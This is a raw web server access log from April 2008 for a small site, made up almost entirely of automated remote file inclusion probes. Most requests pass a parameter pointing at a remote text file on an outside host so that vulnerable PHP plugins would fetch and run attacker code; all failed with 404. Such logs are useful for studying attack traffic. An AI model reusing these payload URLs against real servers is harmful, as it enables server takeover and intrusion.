77.79.244.216 - - [13/Apr/2008:19:37:47 -0700] "GET //amember/plugins/payment/secpay/config.inc.php?config%5Broot_dir%5D=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.toulouseangloexchange.com"
77.79.244.216 - - [13/Apr/2008:19:37:47 -0700] "GET /logs//amember/plugins/payment/secpay/config.inc.php?config%5Broot_dir%5D=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.toulouseangloexchange.com"
209.92.158.55 - - [13/Apr/2008:19:38:44 -0700] "GET /logs//com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.toulouseangloexchange.com"
209.92.158.55 - - [13/Apr/2008:19:38:44 -0700] "GET //com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.toulouseangloexchange.com"
216.167.156.20 - - [13/Apr/2008:19:38:54 -0700] "GET //amember/plugins/payment/secpay/config.inc.php?config%5Broot_dir%5D=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.toulouseangloexchange.com"
216.167.156.20 - - [13/Apr/2008:19:38:55 -0700] "GET /logs//amember/plugins/payment/secpay/config.inc.php?config%5Broot_dir%5D=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.toulouseangloexchange.com"
74.200.207.18 - - [13/Apr/2008:19:39:28 -0700] "GET /logs/access_080225.log//include.php?path[docroot]=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.200.207.18 - - [13/Apr/2008:19:39:28 -0700] "GET //include.php?path[docroot]=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.200.207.18 - - [13/Apr/2008:19:39:28 -0700] "GET /logs//include.php?path[docroot]=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.100.6.58 - - [13/Apr/2008:19:39:36 -0700] "GET //amember/plugins/payment/secpay/config.inc.php?config%5Broot_dir%5D=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.toulouseangloexchange.com"
61.100.6.58 - - [13/Apr/2008:19:39:36 -0700] "GET /logs//amember/plugins/payment/secpay/config.inc.php?config%5Broot_dir%5D=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.toulouseangloexchange.com"
85.25.144.182 - - [13/Apr/2008:19:40:46 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.toulouseangloexchange.com"
84.246.21.243 - - [13/Apr/2008:19:40:49 -0700] "GET /index.php?pagename=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
84.246.21.243 - - [13/Apr/2008:19:40:49 -0700] "GET /logs/index.php?pagename=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
85.25.144.182 - - [13/Apr/2008:19:40:51 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.toulouseangloexchange.com"
213.215.223.191 - - [13/Apr/2008:19:41:04 -0700] "GET //com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.toulouseangloexchange.com"
213.215.223.191 - - [13/Apr/2008:19:41:04 -0700] "GET /logs//com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.toulouseangloexchange.com"
222.236.47.176 - - [13/Apr/2008:19:41:14 -0700] "GET /logs/index.php?option=com_ewriting&link=&action=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
222.236.47.176 - - [13/Apr/2008:19:41:15 -0700] "GET /index.php?option=com_ewriting&link=&action=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
202.191.38.81 - - [13/Apr/2008:19:41:19 -0700] "GET /logs//amember/plugins/payment/secpay/config.inc.php?config%5Broot_dir%5D=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
202.191.38.81 - - [13/Apr/2008:19:41:19 -0700] "GET //amember/plugins/payment/secpay/config.inc.php?config%5Broot_dir%5D=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
74.52.130.178 - - [13/Apr/2008:19:41:53 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
74.52.130.178 - - [13/Apr/2008:19:41:53 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
74.200.207.18 - - [13/Apr/2008:19:42:00 -0700] "GET /logs/access_080303.log//content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.200.207.18 - - [13/Apr/2008:19:42:00 -0700] "GET //content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.200.207.18 - - [13/Apr/2008:19:42:00 -0700] "GET /logs//content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
77.79.244.216 - - [13/Apr/2008:19:42:54 -0700] "GET /logs/plugins/payment/secpay/config.inc.php?config%5Broot_dir%5D=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.toulouseangloexchange.com"
77.79.244.216 - - [13/Apr/2008:19:42:54 -0700] "GET /plugins/payment/secpay/config.inc.php?config%5Broot_dir%5D=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.toulouseangloexchange.com"
220.162.238.35 - - [13/Apr/2008:19:43:14 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://chrystylcoiffure.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
220.162.238.35 - - [13/Apr/2008:19:43:15 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://chrystylcoiffure.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
72.30.216.101 - - [13/Apr/2008:19:43:29 -0700] "GET /logs/access_080303.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
216.167.156.20 - - [13/Apr/2008:19:43:31 -0700] "GET /logs/plugins/payment/secpay/config.inc.php?config%5Broot_dir%5D=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.toulouseangloexchange.com"
216.167.156.20 - - [13/Apr/2008:19:43:31 -0700] "GET /plugins/payment/secpay/config.inc.php?config%5Broot_dir%5D=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.toulouseangloexchange.com"
61.100.6.58 - - [13/Apr/2008:19:44:37 -0700] "GET /logs/plugins/payment/secpay/config.inc.php?config%5Broot_dir%5D=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.toulouseangloexchange.com"
61.100.6.58 - - [13/Apr/2008:19:44:37 -0700] "GET /plugins/payment/secpay/config.inc.php?config%5Broot_dir%5D=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.toulouseangloexchange.com"
66.212.23.249 - - [13/Apr/2008:19:44:41 -0700] "GET /plugins/payment/secpay/config.inc.php?config%5Broot_dir%5D=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.toulouseangloexchange.com"
66.212.23.249 - - [13/Apr/2008:19:44:43 -0700] "GET /logs/plugins/payment/secpay/config.inc.php?config%5Broot_dir%5D=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.toulouseangloexchange.com"
202.191.38.81 - - [13/Apr/2008:19:45:05 -0700] "GET /plugins/payment/secpay/config.inc.php?config%5Broot_dir%5D=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
202.191.38.81 - - [13/Apr/2008:19:45:05 -0700] "GET /logs/plugins/payment/secpay/config.inc.php?config%5Broot_dir%5D=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
74.200.207.18 - - [13/Apr/2008:19:45:06 -0700] "GET /logs/access_080303.log//include.php?path[docroot]=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
69.93.107.242 - - [13/Apr/2008:19:46:48 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://www.holeshot.co.nz/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
69.93.107.242 - - [13/Apr/2008:19:46:48 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.holeshot.co.nz/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
69.93.107.242 - - [13/Apr/2008:19:46:48 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.holeshot.co.nz/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
86.60.75.241 - - [13/Apr/2008:19:48:16 -0700] "GET /logs/access_071015.log HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
86.60.75.241 - - [13/Apr/2008:19:48:19 -0700] "GET /logs/access_080128.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
208.71.129.241 - - [13/Apr/2008:19:48:54 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.toulouseangloexchange.com"
208.71.129.241 - - [13/Apr/2008:19:48:54 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.toulouseangloexchange.com"
69.93.107.242 - - [13/Apr/2008:19:50:20 -0700] "GET /logs/access_080128.log//modules/vwar/admin/admin.php?vwar_root=http://www.holeshot.co.nz/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
69.93.107.242 - - [13/Apr/2008:19:52:58 -0700] "GET /logs//script_path/templates/2blue/bodyTemplate.php?serverPath=http://www.boewe-security.de/galerie//update/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
69.93.107.242 - - [13/Apr/2008:19:52:58 -0700] "GET //script_path/templates/2blue/bodyTemplate.php?serverPath=http://www.boewe-security.de/galerie//update/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
69.93.107.242 - - [13/Apr/2008:19:53:29 -0700] "GET /logs/access.log//script_path/templates/2blue/bodyTemplate.php?serverPath=http://www.boewe-security.de/galerie//update/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
69.93.107.242 - - [13/Apr/2008:19:53:29 -0700] "GET //script_path/templates/2blue/bodyTemplate.php?serverPath=http://www.boewe-security.de/galerie//update/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
69.93.107.242 - - [13/Apr/2008:19:53:29 -0700] "GET /logs//script_path/templates/2blue/bodyTemplate.php?serverPath=http://www.boewe-security.de/galerie//update/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
70.84.7.82 - - [13/Apr/2008:19:53:32 -0700] "GET //browser.php?error=http://dkgerman.dankook.ac.kr/bbs/icon/private_style/style/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.toulouseangloexchange.com"
70.84.7.82 - - [13/Apr/2008:19:53:33 -0700] "GET /logs//browser.php?error=http://dkgerman.dankook.ac.kr/bbs/icon/private_style/style/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.toulouseangloexchange.com"
69.93.107.242 - - [13/Apr/2008:19:53:36 -0700] "GET /logs/access_080303.log//script_path/templates/2blue/bodyTemplate.php?serverPath=http://www.boewe-security.de/galerie//update/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
69.93.107.242 - - [13/Apr/2008:19:53:40 -0700] "GET //script_path/templates/2blue/bodyTemplate.php?serverPath=http://www.boewe-security.de/galerie//update/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
69.89.27.217 - - [13/Apr/2008:19:55:13 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://bnb-chambresdhotes.ch///components/com_easygallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
69.89.27.217 - - [13/Apr/2008:19:55:13 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://bnb-chambresdhotes.ch///components/com_easygallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
69.89.27.217 - - [13/Apr/2008:19:55:13 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://bnb-chambresdhotes.ch///components/com_easygallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
69.89.27.217 - - [13/Apr/2008:19:55:20 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://bnb-chambresdhotes.ch///components/com_easygallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
209.92.158.55 - - [13/Apr/2008:19:55:46 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.toulouseangloexchange.com"
209.92.158.55 - - [13/Apr/2008:19:55:46 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.toulouseangloexchange.com"
64.141.103.91 - - [13/Apr/2008:19:56:43 -0700] "GET //includes/kb_constants.php?module_root_path=http://www.systel.ru/phpbb2//language/lang_german/list.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.toulouseangloexchange.com"
64.141.103.91 - - [13/Apr/2008:19:56:43 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://www.systel.ru/phpbb2//language/lang_german/list.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.toulouseangloexchange.com"
69.93.107.242 - - [13/Apr/2008:19:57:51 -0700] "GET //script_path/templates/2blue/bodyTemplate.php?serverPath=http://www.boewe-security.de/galerie//update/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
69.93.107.242 - - [13/Apr/2008:19:58:00 -0700] "GET /logs/access.log//script_path/templates/2blue/bodyTemplate.php?serverPath=http://www.boewe-security.de/galerie//update/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
69.93.107.242 - - [13/Apr/2008:19:58:00 -0700] "GET //script_path/templates/2blue/bodyTemplate.php?serverPath=http://www.boewe-security.de/galerie//update/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
69.93.107.242 - - [13/Apr/2008:19:58:00 -0700] "GET /logs//script_path/templates/2blue/bodyTemplate.php?serverPath=http://www.boewe-security.de/galerie//update/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
80.190.131.43 - - [13/Apr/2008:20:00:07 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://bnb-chambresdhotes.ch///components/com_easygallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
80.190.131.43 - - [13/Apr/2008:20:00:07 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://bnb-chambresdhotes.ch///components/com_easygallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
80.190.131.43 - - [13/Apr/2008:20:00:07 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://bnb-chambresdhotes.ch///components/com_easygallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
80.190.131.43 - - [13/Apr/2008:20:00:07 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://bnb-chambresdhotes.ch///components/com_easygallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
208.71.129.241 - - [13/Apr/2008:20:00:13 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.toulouseangloexchange.com"
208.71.129.241 - - [13/Apr/2008:20:00:13 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.toulouseangloexchange.com"
69.89.27.217 - - [13/Apr/2008:20:00:39 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://bnb-chambresdhotes.ch///components/com_easygallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
69.89.27.217 - - [13/Apr/2008:20:00:39 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://bnb-chambresdhotes.ch///components/com_easygallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
69.89.27.217 - - [13/Apr/2008:20:00:39 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://bnb-chambresdhotes.ch///components/com_easygallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
69.89.27.217 - - [13/Apr/2008:20:00:39 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://bnb-chambresdhotes.ch///components/com_easygallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
84.246.21.243 - - [13/Apr/2008:20:01:04 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
84.246.21.243 - - [13/Apr/2008:20:01:04 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
69.89.27.217 - - [13/Apr/2008:20:01:11 -0700] "GET /logs/access_080225.log//admin/business_inc/saveserver.php?thisdir=http://bnb-chambresdhotes.ch///components/com_easygallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
213.215.223.191 - - [13/Apr/2008:20:02:37 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.toulouseangloexchange.com"
213.215.223.191 - - [13/Apr/2008:20:02:38 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.toulouseangloexchange.com"
74.200.207.18 - - [13/Apr/2008:20:02:56 -0700] "GET /logs/access_071231.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.200.207.18 - - [13/Apr/2008:20:02:56 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.200.207.18 - - [13/Apr/2008:20:02:56 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
85.25.144.182 - - [13/Apr/2008:20:02:57 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.toulouseangloexchange.com"
85.25.144.182 - - [13/Apr/2008:20:02:58 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.toulouseangloexchange.com"
64.141.103.91 - - [13/Apr/2008:20:03:29 -0700] "GET /index1.php?=http://www.systel.ru/phpbb2//language/lang_german/list.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
64.141.103.91 - - [13/Apr/2008:20:03:32 -0700] "GET /logs/index1.php?=http://www.systel.ru/phpbb2//language/lang_german/list.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.toulouseangloexchange.com"
74.200.207.18 - - [13/Apr/2008:20:05:22 -0700] "GET /logs/access_080303.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
209.97.203.110 - - [13/Apr/2008:20:05:40 -0700] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://www.victoriakart.ru/usr/extensions/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.toulouseangloexchange.com"
209.97.203.110 - - [13/Apr/2008:20:05:40 -0700] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://www.victoriakart.ru/usr/extensions/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.toulouseangloexchange.com"
222.236.47.176 - - [13/Apr/2008:20:06:09 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
222.236.47.176 - - [13/Apr/2008:20:06:09 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
69.93.107.242 - - [13/Apr/2008:20:08:22 -0700] "GET /logs//script_path/templates/2blue/bodyTemplate.php?serverPath=http://www.boewe-security.de/galerie//update/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
69.93.107.242 - - [13/Apr/2008:20:08:22 -0700] "GET //script_path/templates/2blue/bodyTemplate.php?serverPath=http://www.boewe-security.de/galerie//update/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
